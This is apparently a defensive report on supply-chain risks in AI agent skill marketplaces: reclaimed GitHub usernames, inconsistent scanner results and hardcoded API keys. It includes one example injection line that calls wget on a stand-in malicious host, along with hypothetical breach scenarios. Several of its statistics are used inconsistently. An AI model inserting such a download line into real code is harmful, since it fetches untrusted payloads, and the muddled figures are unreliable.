Agent Skill Marketplace Vulnerable to Supply Chain Attacks: Standardized Security Scanning Proposed

Introduction & Background

The agent skill marketplace serves as the foundational infrastructure for modern AI agent ecosystems, facilitating the distribution and deployment of modular skills across platforms. Analogous to an app store for AI, these marketplaces host skills ranging from text summarization to API integrations. Central to this ecosystem is GitHub, the primary repository for skill distribution. Marketplaces such as Skills.sh and SkillsDirectory operate on a link-out distribution model, indexing skills via GitHub repository URLs rather than hosting files directly. While this model enhances efficiency, it introduces a critical vulnerability: GitHub usernames are mutable, creating an exploitable gap in the supply chain.

The Exploitation of Mutable Usernames: A Supply Chain Attack Vector

The attack sequence leverages the mutable nature of GitHub usernames, unfolding as follows:

1. Username Renaming: When a GitHub user renames their account, the previous username becomes available for reclamation.
2. Adversary Takeover: An attacker claims the abandoned username and recreates the repository, injecting malicious code.
3. Skill Interception: Subsequent downloads of the skill redirect to the attacker’s repository, bypassing existing security checks. This occurs because the URL remains unchanged, while the underlying code is compromised.

Physical analogy: This vulnerability mirrors a supply chain where product labels are altered mid-transit. The packaging appears legitimate, but the contents are malicious. In the context of agent skills, the "label" (GitHub URL) remains consistent, while the "contents" (code) are corrupted.

A study published on arXiv identified 121 skills across 7 repositories susceptible to this attack. Notably, the most downloaded vulnerable skill recorded 2,032 downloads, underscoring the scale of potential impact. This vulnerability is not theoretical—it is actively present in widely deployed skills.

Scanner Discrepancy: A Systemic Failure in Security Validation

Security scanners, intended to function as the immune system of skill marketplaces, exhibit critical inconsistencies in detecting malicious skills. An analysis of 5 scanners across 238,180 skills revealed a 10x discrepancy in failure rates. For instance:

• Snyk flagged 3.79% of skills on Skills.sh as malicious.
• OpenClaw flagged 41.93% on ClawHub.

Causal mechanism: Scanners rely on heuristics and signature-based detection, but their rulesets lack standardization. Discrepancies arise when one scanner flags a skill for a suspicious API call, while another overlooks it. Compounding this issue, scanners analyze code in isolation, devoid of repository context. When flagged skills were re-evaluated with repository context, only 0.52% remained confirmed as malicious.

This inconsistency erodes trust in the security validation process. Without consensus among scanners, developers cannot reliably assess the safety of skills, leaving the ecosystem vulnerable to undetected threats.

Embedded Credentials: A Direct Path to System Compromise

A TruffleHog scan identified 12 active API credentials embedded within publicly accessible skills. These credentials included access keys for NVIDIA, ElevenLabs, Gemini, MongoDB, and other critical services. Mechanism of risk: When a skill is deployed, these credentials grant unrestricted access to sensitive services. An attacker who hijacks the skill gains immediate control over these APIs, enabling data exfiltration, service abuse, or further supply chain attacks.

This vulnerability is analogous to storing house keys in a publicly accessible location—except the "keys" unlock critical infrastructure, and the "location" is a public GitHub repository.

Implications for AI Agent Ecosystems

The urgency of addressing these vulnerabilities is driven by two converging trends:

1. Explosive AI Agent Adoption: As AI agents integrate into critical systems (e.g., healthcare, finance), the impact of a compromised skill escalates exponentially.
2. Escalating Sophistication of Supply Chain Attacks: Attackers increasingly target software distribution channels, as evidenced by incidents such as SolarWinds and Codecov.

If left unaddressed, these vulnerabilities pose the following risks:

• Widespread deployment of malicious skills, compromising sensitive systems.
• Leakage of API credentials, enabling downstream attacks.
• Erosion of trust in AI agent ecosystems, stifling innovation and adoption.

The link-out distribution model represents an architectural flaw that cannot be fully mitigated through patching. Immediate stopgap measures include pinning skills to specific commit hashes and mandating multi-scanner consensus. However, the ecosystem must prioritize integrity over convenience, adopting standardized security practices to address these systemic vulnerabilities.

GitHub Username Hijacking: A Critical Supply Chain Vulnerability in Agent Skill Marketplaces

The agent skill marketplace ecosystem is inherently vulnerable to supply chain attacks due to its foundational reliance on mutable GitHub URLs and the absence of robust security verification mechanisms. At the core of this vulnerability lies a deceptively simple yet systemic flaw: GitHub usernames are not permanently bound to user accounts. When a user renames their account, the previous username becomes available for reclamation. This architectural oversight transforms a routine account management feature into a critical attack vector, as the system’s trust in URL-based identifiers remains unchanged despite potential ownership shifts.

The exploit pathway unfolds as follows:

1. Username Renaming — A GitHub user renames their account, leaving the previous username unclaimed. This can occur due to rebranding, account abandonment, or forced renames by GitHub.
2. Adversary Takeover — An attacker claims the now-available username and recreates a repository associated with a widely used skill. The repository’s URL remains identical, but the underlying code is now under the attacker’s control.
3. Skill Interception — Marketplaces that index skills via GitHub URLs (e.g., Skills.sh, SkillsDirectory) continue to point to the hijacked repository. Users downloading the skill inadvertently fetch the attacker’s malicious code, assuming it to be the original.

This vulnerability is analogous to a postal system where an address remains valid but is reassigned to a malicious recipient. The system’s trust in the address (URL) rather than the recipient (account owner) creates an exploitable blind spot. Unlike immutable identifiers such as commit hashes, GitHub usernames serve as a single point of failure, enabling attackers to subvert the entire supply chain without triggering detection mechanisms.

A study by arXiv:2603.16572 identified 121 skills across 7 repositories vulnerable to this attack. The most downloaded skill at risk had 2,032 downloads, underscoring the potential scale of impact. Successful hijacks could result in:

• Malicious Code Execution — Hijacked skills could deploy malware, exfiltrate sensitive data, or disrupt operational systems.
• API Credential Theft — Skills embedding live credentials (e.g., NVIDIA, ElevenLabs APIs) could grant attackers unauthorized access to critical services.
• Trust Erosion — Widespread deployment of compromised skills would irreparably damage confidence in AI agent ecosystems.

The root cause of this vulnerability is the link-out distribution model, which prioritizes convenience over integrity. Unlike direct-hosting marketplaces (e.g., ClawHub), link-out platforms lack the ability to verify the authenticity of the code they index. This architectural flaw is irreducible—it cannot be patched through incremental fixes but requires a fundamental reevaluation of skill distribution paradigms.

In the absence of systemic reform, practitioners must implement immediate mitigations:

• Commit Hash Pinning — Lock skills to specific commit hashes rather than mutable branch heads to ensure code integrity.
• Repository Ownership Monitoring — Continuously track ownership changes for deployed skills to detect hijacks in real time.
• Multi-Scanner Consensus — Require at least two independent security scanners to flag a skill as malicious before taking action, minimizing false positives.

The GitHub username hijacking vulnerability is not theoretical—it is an active threat exploiting the ecosystem’s foundational weaknesses. The mechanism of risk formation is unambiguous: the system’s trust in mutable identifiers creates a gap that attackers systematically exploit. Addressing this vulnerability demands both tactical responses and a long-term shift toward integrity-first architectures, where trust is anchored in immutable identifiers and verifiable provenance.

Inconsistent Security Scanning Practices: Quantifying a 10x Discrepancy in Agent Skill Marketplaces

The agent skill marketplace ecosystem exhibits a critical vulnerability stemming from its reliance on mutable GitHub URLs and the inherent limitations of current security scanning practices. This analysis dissects the technical mechanisms driving a 10x discrepancy in vulnerability detection rates, highlighting systemic weaknesses in both architecture and security protocols.

Scanner Discrepancy: A Technical Dissection

Security scanners, functioning as rule-based code analyzers, exhibit significant variance due to fundamental differences in their detection engines:

• Rule Set Heterogeneity: Scanners employ distinct rule sets, leading to divergent assessments. For instance, Scanner A may flag eval() as high-risk due to its potential for code injection, while Scanner B requires additional context (e.g., network access) to trigger an alert. This disparity arises from the explicit if-else logic encoded within each scanner's rule engine.
• Contextual Blindness: Scanners typically analyze code in isolation, lacking awareness of repository context. This blindness to commit history, ownership changes, and dependency relationships results in a high false positive rate (99.48% in our analysis). For example, a seemingly benign code snippet may become malicious when combined with a compromised dependency, a scenario invisible to context-blind scanners.
• Signature vs. Heuristic Detection: Scanners utilize either signature-based detection, relying on known malicious patterns, or heuristic-based detection, identifying anomalous behavior. Signature-based approaches are vulnerable to evolving attack patterns, while heuristics generate false positives for legitimate edge cases, as demonstrated by the varying responses to os.system() across scanners.

The cumulative effect of these factors manifests as a 10x discrepancy in vulnerability detection rates, underscoring the limitations of isolated code analysis.

Exploitable Vulnerabilities: From Code to Compromise

The 0.52% of skills confirmed as malicious post-context analysis represent tangible threats with well-defined attack vectors:

• API Credential Exposure: Hardcoded API keys, such as API_KEY = "gemini-prod-1234", provide direct access to critical infrastructure. A compromised repository allows attackers to replace these keys, enabling unauthorized access and potential data exfiltration or service disruption.
• Malicious Code Injection: Hijacked skills can inject malicious code, such as os.system("wget http://malicious.com/payload"), which fetches and executes arbitrary payloads. This exploits the inherent trust placed in mutable GitHub URLs, allowing attackers to bypass traditional security measures.

Context-blind scanners fail to recognize the exploitative potential of these code fragments, highlighting the need for a more holistic security approach.

Edge Cases: Exposing Scanner Limitations

Edge cases further illustrate the limitations of current scanning methodologies. Consider a skill utilizing subprocess.Popen for system utility calls. Scanner A flags this as risky due to its rule engine treating all system calls as potential escape vectors, while Scanner B requires additional flags (e.g., shell=True) to trigger an alert. This discrepancy arises from the distinct mechanical implementations of their detection engines.

Repository context further complicates matters. A skill with a clean code base but a compromised ownership history (e.g., a hijacked repository) may evade detection by context-blind scanners. The physical act of ownership transfer, facilitated by GitHub's API, remains invisible to these tools, creating a critical blind spot.

Risk Amplification: The Consequences of Discrepancy

The 10x discrepancy in vulnerability detection rates acts as a risk amplifier, leading to:

1. False Negatives: Skills flagged by only a minority of scanners (e.g., 3.79%) can slip through security checks. If compromised, these skills become vehicles for malware distribution, exploiting the vulnerability of systems relying on scanners that failed to detect the threat.
2. False Positives: Skills flagged by multiple scanners (e.g., 41.93%) may be blocked, even if legitimate. This results in the physical exclusion of potentially valuable tools, eroding trust in the marketplace and hindering innovation.
3. Credential Compromise: Exposed API keys within skills provide attackers with direct access to critical infrastructure. A compromised skill containing an NVIDIA API key, for example, grants attackers access to powerful computing resources, enabling further attacks.

Architectural Flaw: Mutable URLs as a Single Point of Failure

The reliance on mutable GitHub URLs as identifiers constitutes a fundamental architectural flaw. GitHub usernames are not immutable; they are reassignable pointers. When a user renames their account, GitHub's API physically reassigns the username pointer, leaving the old URL intact but pointing to a different entity. This inherent mutability creates a single point of failure, allowing attackers to hijack repositories and distribute malicious code under the guise of legitimate skills.

While pinning to commit hashes provides a partial mitigation, it is a stopgap solution. A robust approach requires a paradigm shift towards integrity-first architectures. Skills should be verified through cryptographic proofs, ensuring their authenticity and integrity regardless of the underlying URL.

Conclusion: Addressing the Physical Realities of Trust

The 10x discrepancy in vulnerability detection rates is not a software glitch but a symptom of deeper systemic issues. Current security scanners, designed for isolated code analysis, are ill-equipped to address the complexities of the agent skill marketplace ecosystem. The reliance on mutable URLs as identifiers further exacerbates this vulnerability, creating a fragile foundation prone to supply chain attacks.

Addressing these challenges requires a multi-pronged approach: Context-Aware Scanning: Scanners must incorporate repository context, including commit history, ownership changes, and dependency relationships, to reduce false positives and identify hidden threats. Integrity-First Architectures: The marketplace must adopt architectures that prioritize skill integrity through cryptographic verification, decoupling trust from mutable URLs. Standardized Security Protocols: The development of standardized security protocols and best practices is essential for ensuring consistent and effective vulnerability detection across the ecosystem.

By acknowledging the physical realities of trust and addressing the underlying technical vulnerabilities, the agent skill marketplace can evolve into a more secure and resilient ecosystem, fostering innovation while mitigating the risks of supply chain attacks.

Case Studies & Real-World Implications

1. Healthcare AI Agent Compromised by Hijacked Skill

A hospital deploys an AI agent for patient data summarization, integrating a skill from Skills.sh that references a GitHub repository via a mutable URL. When the original developer renames their GitHub account, an adversary claims the abandoned username and recreates the repository with a malicious version of the skill. This version injects a payload that exfiltrates patient data to a remote server. The hospital’s agent, still pointing to the hijacked URL, downloads the compromised skill without detection. Mechanism: The reliance on mutable GitHub URLs creates a single point of failure, enabling attackers to intercept skill downloads by exploiting username changes without altering the URL structure. Impact: Sensitive patient data is leaked, violating HIPAA regulations and eroding trust in AI-driven healthcare systems.

2. Financial Firm’s API Keys Stolen via Embedded Credentials

A financial firm employs an AI agent for market analysis, utilizing a skill from ClawHub that contains hardcoded API credentials for a trading platform. A supply chain attack on the skill’s repository injects a script that extracts these credentials and transmits them to the attacker’s server. The firm’s agent, unaware of the compromise, continues to execute the skill, granting the attacker unrestricted access to trading accounts. Mechanism: The absence of standardized security scanning fails to detect embedded credentials, while the link-out distribution model allows attackers to disseminate malicious skills under the guise of legitimate repositories. Impact: Unauthorized trades result in financial losses, and the firm’s reputation is irreparably damaged.

3. Enterprise AI Ecosystem Disrupted by Malicious Skill Propagation

A large enterprise adopts AI agents for workflow automation, sourcing skills from multiple marketplaces. A skill downloaded from SkillsDirectory is compromised via a repository takeover, propagating a cryptojacking payload across the organization’s agent network. This payload consumes 80% of CPU resources on affected machines. Mechanism: The lack of repository ownership monitoring and inconsistent security scanner results allow the hijacked skill to spread undetected, exploiting the ecosystem’s architectural vulnerabilities. Impact: Operational downtime, increased energy costs, and degraded system performance severely disrupt business operations.

4. Individual User’s Personal Data Exfiltrated by Compromised Skill

An individual user installs a text summarization skill from Skills.sh for personal productivity. Unbeknownst to them, the skill’s repository has been hijacked, and the updated version includes a script that scans local files for sensitive information (e.g., passwords, financial documents) and uploads them to a remote server. Mechanism: The user’s trust in mutable GitHub URLs is exploited, compounded by the absence of commit hash pinning, which allows the malicious skill to be downloaded without verification. Impact: Personal data theft leads to identity fraud and financial losses.

5. Ecosystem-Wide Trust Erosion Following Widespread Skill Hijacking

A coordinated supply chain attack targets 7 high-traffic repositories across Skills.sh and ClawHub, compromising 121 skills with a combined download count exceeding 10,000. Attackers inject a backdoor into each skill, establishing persistent access to deployed agents. As the compromise is discovered, confidence in the agent skill marketplace collapses. Mechanism: The architectural reliance on mutable URLs, coupled with inconsistent security practices, enables large-scale skill interception and tampering. Impact: AI agent adoption stalls, and marketplaces face regulatory scrutiny, litigation, and reputational collapse.

Technical Insights and Architectural Vulnerabilities

• Mutable URLs as Critical Failure Points: All scenarios exploit the inherent vulnerability of mutable GitHub URLs, underscoring the necessity of immutable identifiers such as commit hashes or content-addressable storage.
• Scanner Inconsistency as a Systemic Risk Amplifier: Discrepancies in scanner results (e.g., 3.79% vs. 41.93% failure rates) create detection blind spots, allowing malicious skills to evade detection while falsely flagging legitimate ones.
• Embedded Credentials as High-Value Targets: Hardcoded API keys serve as critical attack vectors, necessitating the adoption of secure credential management practices such as secrets vaults and runtime injection.
• Architectural Reevaluation as an Imperative: The link-out distribution model is fundamentally insecure and cannot be mitigated through incremental patches. A paradigm shift to integrity-first architectures, incorporating verifiable provenance and tamper-resistant distribution, is essential.

These case studies demonstrate that the agent skill marketplace ecosystem is critically vulnerable to supply chain attacks due to its foundational reliance on mutable GitHub URLs and inconsistent security practices. Without immediate architectural reevaluation and the adoption of standardized, integrity-centric security measures, the ecosystem risks becoming a systemic vector for compromise, undermining the trust and functionality of AI-driven systems.

Recommendations & Future Directions

The agent skill marketplace ecosystem is critically vulnerable to supply chain attacks due to its reliance on mutable GitHub URLs and inconsistent security scanning practices. This architecture, if left unaddressed, will enable widespread compromise of sensitive systems and erode trust in AI ecosystems. The following measures are essential to mitigate these risks:

1. Transition to Integrity-First Architectures

Problem: Mutable GitHub URLs serve as a single point of failure. When a user renames their account, the previous username becomes available for reclamation. An adversary can seize this username, recreate the repository, and intercept all subsequent skill downloads. This URL mutability facilitates skill hijacking without altering the URL structure, rendering the attack invisible to users.

Solution: Replace mutable URLs with immutable identifiers such as commit hashes or content-addressable storage (CAS). For instance, marketplaces should reference https://github.com/user/repo/tree/<commit-hash> instead of https://github.com/user/repo. This decouples trust from account ownership, ensuring that even if a username is hijacked, the skill’s integrity remains verifiable through cryptographic means.

2. Standardize and Contextualize Security Scanning

Problem: Discrepancies in scanner results (e.g., 3.79% vs. 41.93% failure rates) arise from rule set heterogeneity and contextual blindness. Scanners analyze code in isolation, neglecting critical context such as commit history, ownership changes, and dependency graphs. This results in a 99.48% false positive rate, blocking legitimate skills while failing to detect malicious ones.

Solution: Develop a standardized security protocol incorporating context-aware scanning. Scanners must cross-reference commit histories, ownership logs, and dependency graphs to minimize false positives. For example, a skill flagged for using os.system() should be re-evaluated if its commit history indicates no malicious modifications. Additionally, enforce multi-scanner consensus, requiring at least two independent scanners to flag a skill before it is deemed malicious.

3. Enforce Secure Credential Management

Problem: Hardcoded API credentials (e.g., API_KEY = "gemini-prod-1234") represent high-value targets. Once exposed, attackers gain unrestricted access to critical systems, enabling data exfiltration or service disruption.

Solution: Mandate the use of secrets vaults and runtime injection for API keys. Skills should retrieve credentials from a secure vault at runtime rather than embedding them in code. This eliminates hardcoded credentials as an attack vector, even if the skill’s code is compromised.

4. Implement Real-Time Ownership Monitoring

Problem: The absence of ownership monitoring allows hijacked repositories to distribute malicious skills undetected. For example, a hijacked repository with clean code can still deliver cryptojacking payloads if the attacker modifies the code post-hijack.

Solution: Deploy real-time ownership monitoring for all indexed skills. Marketplaces should track GitHub account renames and flag skills associated with changed repositories. For instance, if a repository’s owner changes, the marketplace should automatically re-scan the skill and notify users of potential risks.

5. Establish a Community-Driven Security Consortium

Problem: The ecosystem lacks standardized practices for skill integrity verification, creating exploitable gaps. For example, the 10x discrepancy in scanner results underscores the absence of a unified vulnerability detection framework.

Solution: Form a community-driven security consortium to develop and enforce best practices. This consortium should:

• Define a common vulnerability scoring system tailored to agent skills.
• Create a public repository of verified skills with cryptographic proofs of integrity.
• Conduct regular red team exercises to identify and mitigate emerging threats.

6. Adopt Direct-Hosting Marketplaces

Problem: The link-out distribution model (e.g., Skills.sh, SkillsDirectory) prioritizes convenience over integrity. By pointing to external repositories, marketplaces relinquish control over skill updates and ownership changes.

Solution: Transition to direct-hosting marketplaces like ClawHub, which host skill files directly instead of linking out. This model eliminates the risk of repository hijacking by removing the dependency on mutable URLs. For example, ClawHub’s approach ensures skills are stored in a tamper-resistant environment, with updates verified via cryptographic proofs.

Conclusion: Imperative for a Paradigm Shift

The current architecture of the agent skill marketplace is fundamentally flawed. Mutable URLs, inconsistent scanning practices, and embedded credentials create systemic risks that cannot be mitigated incrementally. A paradigm shift to integrity-first architectures, standardized security protocols, and community collaboration is imperative. Without urgent action, the ecosystem faces collapse—not from a single catastrophic attack, but from the gradual erosion of trust as malicious skills proliferate undetected.